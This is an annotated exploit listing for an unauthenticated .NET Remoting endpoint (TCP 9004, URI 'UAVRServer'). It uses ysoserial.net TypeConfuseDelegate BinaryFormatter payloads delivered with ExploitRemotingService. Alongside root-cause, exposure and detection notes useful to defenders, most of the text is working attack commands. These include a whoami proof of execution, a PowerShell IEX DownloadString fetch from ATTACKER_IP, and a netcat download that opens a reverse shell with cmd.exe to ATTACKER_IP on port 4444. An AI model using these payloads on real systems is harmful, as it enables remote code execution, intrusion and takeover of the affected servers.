# What this listing shows: a .NET Remoting endpoint (TCP channel, port 9004,
# object URI "UAVRServer", as given on the page) is sent a serialized
# BinaryFormatter object. The TypeConfuseDelegate gadget chain turns
# deserialization of that object into execution of the command string passed
# with -c, in the context of the process hosting the remoting service.
#
# Defender notes:
#   - Root cause: the service deserializes BinaryFormatter data from the
#     network. Microsoft documents BinaryFormatter as unsafe for untrusted input
#     and .NET Remoting as legacy, so the durable fix is to retire the endpoint
#     or move it to a transport that does not use these.
#   - Exposure: limit who can reach TCP 9004 (host firewall, segmentation) and
#     run the hosting service under a low-privilege account.
#   - Detection: process-creation telemetry where the remoting host process is
#     the parent of cmd.exe or powershell.exe. New files under C:\temp, and
#     outbound HTTP or raw TCP connections from the server to unexpected hosts,
#     are further signals.

# Step 1: Generate payload with ysoserial.net
#   -f formatter, -o output encoding, -g gadget chain, -c command to embed.
#   The command here is a proof-of-execution marker only: it records the account
#   the service runs as in C:\temp\out.txt.
ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "cmd /c whoami > C:\temp\out.txt"

# Step 2: Use ExploitRemotingService to send payload
#   TARGET_IP is a placeholder. The "raw" command sends the serialized object to
#   the remoting URI without further processing.
ExploitRemotingService.exe tcp://TARGET_IP:9004/UAVRServer raw payload.bin

# Alternative payloads: these use the same TypeConfuseDelegate gadget chain as
# Step 1, and only the embedded command string differs. ATTACKER_IP is a
# placeholder.

# For reverse shell:
#   A remote PowerShell script is fetched and run in memory. PowerShell
#   script-block logging and web-proxy or egress logs are the places to look for
#   this pattern (IEX together with Net.WebClient.DownloadString).
ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "powershell IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/shell.ps1')"

# For file download and execute:
#   A binary is written to C:\temp and started with an outbound connection on
#   port 4444 that is bound to cmd.exe. Egress filtering from the server and
#   application allow-listing both interrupt this variant.
ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "powershell -c curl http://ATTACKER_IP/nc.exe -o C:\temp\nc.exe; C:\temp\nc.exe ATTACKER_IP 4444 -e cmd.exe"